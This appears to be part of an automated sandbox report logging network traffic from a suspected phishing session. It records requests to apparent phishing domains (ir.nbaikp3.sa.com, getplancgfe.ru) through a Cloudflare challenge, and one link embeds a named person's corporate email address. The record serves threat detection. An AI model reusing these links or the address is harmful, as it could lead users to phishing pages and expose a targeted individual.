    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1Host: ir.nbaikp3.sa.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ir.nbaikp3.sa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.comAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: www.google.co.th
    Source: global trafficDNS traffic detected: DNS query: ir.nbaikp3.sa.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: ecoutura.sa.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: getplancgfe.ru
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3359sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:46:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uYyuOXxMuQ1gvbJJVzRhKKVQMUdjh5eiiYnszarNXl9voZneT9WEzAd3OwoHaoaW%2FCazykFRb72kgT8pIxcvEwGSHHUUpy3W9lquW%2FSonCyXsutrWYTgkqvGdFu52LLCgU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbbfc6e981e359f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=997&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1215&delivery_rate=2842001&cwnd=243&unsent_bytes=0&cid=d6b0c53177893c26&ts=5659&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:46:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 8hZDSENL9VZVSsvXrerpSr5Exu8GoNuJVXs=$2EkXFoGP1oUj2dBQServer: cloudflareCF-RAY: 8dbbfc874ead6bae-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:46:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: R0dvhmkDom5/nPjp/lwvo9Th80kJlFuIrAE=$Q/4vFoM2vWMp4UIfServer: cloudflareCF-RAY: 8dbbfc9b3fc46c76-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:46:25 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2UZbZJUiB7aJCh4tfJY7Hnn2bK7cLBfpfx8=$sZXIeceZ4gLp1BQpServer: cloudflareCF-RAY: 8dbbfcd15ee5eb1b-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:47:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JupzcvkWByyELBQkPBc2UEWqjiiW2bdeN%2FBRjioUeKg%2FyO1%2F%2FgSLOzcXw8Kpev4Pc2qO7uTCEh4OuKk5pZOd2UkzK678tu%2FIMFP%2Fr6dwZKpMetWhfzZH7cZGyMLaCZHtXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbbfdabd9b72e2a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1163&delivery_rate=1442949&cwnd=234&unsent_bytes=0&cid=8734c4f04f6bce89&ts=375&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 12:46:03 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
    Source: chromecache_82.2.dr, chromecache_65.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_82.2.dr, chromecache_65.2.drString found in binary or memory: https://fontawesome.com/license/free
    Source: chromecache_67.2.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://getplancgfe.ru//
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://getplancgfe.ru//#contact
    Source: chromecache_68.2.drString found in binary or memory: https://getplancgfe.ru//#inventory
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://getplancgfe.ru//#services
    Source: chromecache_67.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://instagram.com/getplancgfe.ru
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://linkedin.com/in/getplancgfe.ru
    Source: chromecache_83.2.dr, chromecache_68.2.drString found in binary or memory: https://x.com/getplancgfe.ru
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
